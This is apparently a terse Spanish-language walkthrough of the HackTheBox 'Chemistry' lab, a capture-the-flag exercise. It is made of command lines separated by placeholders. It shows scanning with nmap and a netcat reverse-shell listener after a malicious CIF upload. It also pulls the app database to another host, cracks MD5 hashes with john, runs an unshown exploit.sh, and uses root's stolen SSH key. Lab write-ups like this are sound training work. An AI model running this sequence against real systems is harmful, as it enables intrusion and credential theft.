Chemistry

Chemistry

Mar 4, 2026
HTB Linux

nmap -A -p- -oA chemistry 10.129.16.60 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA chemistry 10.129.16.60

echo "10.129.16.60 chemistry.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA chemistry-udp 10.129.16.60

ping -c 1 10.129.16.60

nmap -p- --open -T5 -v -n 10.129.16.60

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.16.60-oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,5000 10.129.16.60 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.129.16.60:5000

ssh_command.

Nos registramos como usuario.

ssh_command.

Bajamos el cif de ejemplo

ssh_command.

ssh_command.

bc test.cif

ssh_command.

ssh_command.

rlwrap nc -lvnp 443

ssh_command.

Vemos otro usuario llamado rosa y una db.

python3 -m http.server 8888

ssh_command.

wget -q http://chemistry.htb:8888/database.db

sqlite3 database.db .dump > database.dmp

ssh_command.

bc database.dmp

ssh_command.

ssh_command.

john --wordlist=/usr/share/wordlists/rockyou.txt hash --format=Raw-MD5 --fork=10

ssh_command.

su rosa

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty size stty rows 24 columns 80

ssh_command.

cat user.tx

ssh_command.

ss -tln

ssh_command.

exploit.sh

ssh_command.

vim id_rsa

ssh_command.

ssh -i id_rsa root@10.129.16.60

ssh_command.

cat root.txt

ssh_command.